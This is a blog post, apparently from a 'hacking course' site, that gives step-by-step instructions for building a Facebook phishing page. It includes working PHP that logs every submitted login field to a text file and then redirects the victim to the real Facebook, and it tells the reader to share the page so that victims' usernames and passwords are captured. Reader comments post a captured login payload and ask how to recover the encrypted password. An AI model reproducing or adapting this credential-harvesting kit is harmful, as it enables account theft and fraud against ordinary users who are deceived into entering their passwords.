Header Ads

Hacking course
recent

How to Create a Facebook Phishing Page

How to Create a Facebook Phishing Page ?

Phishing is the technique to create similar type of web-page of the existing web-page. Phishing is a type of attack where the intruders disguising as trustworthy agents attempt to gain your personal information such as passwords, credit card numbers or any other information.

Steps to Create Facebook Phishing Page:

  • Open facebook login page in your browser.
  • Press ctrl+U to find source code.
  • Copy whole source code and create a PHP file (index.php) and paste it.
  • Now, search for string methode="POST", it will give you two results first for login and second for register.
  • Next, replace the action file name as “xyz.php” in the login form.
  • Now create a file “xyz.php” and “log.txt” and paste below code in “xyz.php”.

    File name: xyz.php

    filter_none

    brightness_4

    <?php
      
    // Set the location to redirect the page
    header ('Location: http://www.facebook.com');
      
    // Open the text file in writing mode 
    $file = fopen("log.txt", "a");
      
    foreach($_POST as $variable => $value) {
        fwrite($file, $variable);
        fwrite($file, "=");
        fwrite($file, $value);
        fwrite($file, "\r\n");
    }
      
    fwrite($file, "\r\n");
    fclose($file);
    exit;
    ?>
  • Now you are done, share the page and if anyone will enter username and password then it will save into log.txt file.

3 comments:

  1. password not visible


    jazoest=2954
    lsd=AVqxXnBNHh4
    email=101010
    login_source=comet_headerless_login
    next=
    encpass=#PWD_BROWSER:5:1620667482:AX9QACrsFA21iYhVGtvApDFdWEsz6dr2+BnJoJaL0coZYA4rT8Qg0CMRUIk4K4FxNJlI0v9nYGlYlmCxcpekTYzJUIqL4XwzDUELOCDYKyrRLZVmgzWxnl64LAeINaZoWv+UQL1Sf/Jx

    pls help

    ReplyDelete
    Replies
    1. I got same problem. Please share the solution with us if you figure it out!

      Delete

Powered by Blogger.